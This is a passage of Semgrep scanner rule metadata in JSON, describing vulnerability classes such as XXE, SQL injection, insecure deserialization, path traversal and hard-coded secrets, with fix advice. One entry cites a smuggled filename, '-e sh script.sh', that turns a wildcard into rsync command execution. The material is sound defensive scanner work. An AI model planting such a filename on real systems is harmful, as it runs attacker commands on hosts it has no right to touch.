HTTP request types from bypassing CORS preflight controls."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","id":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","name":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","id":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","name":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"help":{"markdown":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","id":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","name":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","id":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","name":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli","id":"java.spring.security.jpa-sqli.jpa-sqli","name":"java.spring.security.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Onfido live API Token detected"},"help":{"markdown":"Onfido live API Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token)\n - [https://documentation.onfido.com/api/latest/#api-tokens](https://documentation.onfido.com/api/latest/#api-tokens)\n","text":"Onfido live API Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","id":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","name":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"help":{"markdown":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n","text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder","id":"java.lang.security.audit.xml-decoder.xml-decoder","name":"java.lang.security.audit.xml-decoder.xml-decoder","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-decoder.xml-decoder"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"help":{"markdown":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","id":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","name":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"help":{"markdown":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected)\n - [https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping](https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping)\n - [https://jinja.palletsprojects.com/en/2.11.x/intro/#](https://jinja.palletsprojects.com/en/2.11.x/intro/#)\n","text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected","id":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","name":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.mako-templates-detected.mako-templates-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"help":{"markdown":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification)\n - [https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate](https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate)\n - [https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1](https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1)\n","text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"help":{"markdown":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow](https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow)\n","text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos","id":"cpp.lang.security.strings.std-string-npos.std-string-npos","name":"cpp.lang.security.strings.std-string-npos.std-string-npos","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.std-string-npos.std-string-npos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","id":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","name":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"help":{"markdown":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.nan-injection.nan-injection)\n - [https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868](https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868)\n - [https://blog.bitdiscovery.com/2021/12/python-nan-injection/](https://blog.bitdiscovery.com/2021/12/python-nan-injection/)\n","text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"helpUri":"https://semgrep.dev/r/python.django.security.nan-injection.nan-injection","id":"python.django.security.nan-injection.nan-injection","name":"python.django.security.nan-injection.nan-injection","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.nan-injection.nan-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli)\n - [https://www.psycopg.org/docs/sql.html](https://www.psycopg.org/docs/sql.html)\n","text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","id":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","name":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"help":{"markdown":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected)\n - [https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt](https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)\n","text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","id":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","name":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","properties":{"precision":"very-high","tags":["CWE-155: Improper Neutralization of Wildcards or Matching Symbols","LOW CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.system-wildcard-detected.system-wildcard-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT 